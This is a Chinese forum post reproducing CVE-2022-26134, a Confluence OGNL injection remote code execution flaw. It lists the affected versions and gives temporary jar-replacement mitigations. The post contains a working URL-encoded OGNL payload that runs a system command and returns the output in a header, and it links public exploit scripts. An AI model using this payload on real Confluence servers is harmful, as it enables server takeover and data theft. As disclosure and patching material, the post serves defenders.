新漏洞出现!Confluence远程命令执行漏洞复现

spider   ·   发表于 2022-06-08 23:14:51   ·   漏洞文章

CVE-2022-26134 Confluence远程命令执行漏洞复现

**Confluence介绍

**

2022年06月04日,360CERT监测发现Atlassian官方发布了Confluence OGNL 注入漏洞的风险通告,漏洞编号为CVE-2022-26134,漏洞等级:严重,漏洞评分:9.8。目前该漏洞安全补丁已发布,漏洞细节已公开,POC(概念验证代码)已公开,在野利用已发现。

对此,360CERT建议广大用户及时将Confluence升级到最新版本。与此同时,请做好资产自查以及预防工作,以免遭受黑客攻击。

该漏洞利用难度极低,同时利用方式已经公开,接下来将会有更多的在野利用发生,请使用Confluence的用户及时完成修复。

CVE-2022-26134: Confluence OGNL 注入漏洞
CVE: CVE-2022-26134

组件: Confluence Server & Confluence Data Center

漏洞类型: 代码执行

影响: 服务器接管

简述:Confluence Server和Confluence Data Center上存在一个OGNL注入漏洞,允许经过身份验证或在某些情况下未授权的攻击者,在Confluence Server或Confluence Data Center实例上执行任意代码。
受影响版本

Confluence Server and Data Center >= 1.3.0
Confluence Server and Data Center < 7.4.17
Confluence Server and Data Center < 7.13.7
Confluence Server and Data Center < 7.14.3
Confluence Server and Data Center < 7.15.2
Confluence Server and Data Center < 7.16.4
Confluence Server and Data Center < 7.17.4
Confluence Server and Data Center < 7.18.1

POC

/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/

脚本

https://github.com/Nwqda/CVE-2022-26134/blob/master/cve-2022-26134.py
https://github.com/crowsec-edtech/CVE-2022-26134/blob/main/exploit.py

image-20220608231107681

临时修补建议
替换 xwork 组件 jar
Confluence 7.15.0 - 7.18.0
首先需要停止正在运行的 Confluence

  1. 下载新的 xwork 组件

xwork-1.0.3-atlassian-10.jar

https://packages.atlassian.com/maven-internal/opensymphony/xwork/1.0.3-atlassian-10/xwork-1.0.3-atlassian-10.jar

  1. 从以下目录删除历史 xwork<confluence-install>/confluence/WEB-INF/lib/xwork-1.0.3-atlassian-8.jar

  2. 复制下载好的新 xwork 到<confluence-install>/confluence/WEB-INF/lib/

  3. 重启 Confluence

Confluence 7.0.0 - 7.14.2
首先需要停止正在运行的 Confluence

  1. 下载新的 xwork 等组件
  • xwork-1.0.3-atlassian-10.jar

  • webwork-2.1.5-atlassian-4.jar

  • CachedConfigurationProvider.class

  1. 从以下目录删除
    <confluence-install>/confluence/WEB-INF/lib/xwork-1.0.3.6.jar
    <confluence-install>/confluence/WEB-INF/lib/webwork-2.1.5-atlassian-3.jar
  2. 在<confluence-install>/confluence/WEB-INF/classes/com/atlassian/confluence/setup目录下

创建新文件夹webwork

复制CachedConfigurationProvider.class到<confluence-install>/confluence/WEB-INF/classes/com/atlassian/confluence/setup/webwork/CachedConfigurationProvider.class

  1. 重启 Confluence
用户名金币积分时间理由
Track-劲夫 50.00 0 2022-06-10 17:05:14 一个受益终生的帖子~~

打赏我,让我更有动力~

0 条回复   |  直到 2022-6-8 | 977 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.